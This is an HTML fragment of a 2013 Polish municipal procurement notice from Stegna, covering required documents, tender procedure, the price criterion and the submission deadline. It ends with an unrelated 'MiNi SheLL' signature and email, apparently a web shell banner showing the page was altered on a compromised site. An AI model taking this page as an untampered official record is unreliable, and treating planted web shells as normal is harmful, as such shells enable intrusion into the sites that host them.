<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stegna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Stegnie, ul. Gdańska 34, 82-103 Stegna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 09:00, miejsce: Sekretariat pok. nr 16, Urzędu Gminy w Stegnie, ul. Gdanska 34, 82-103 Stegna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com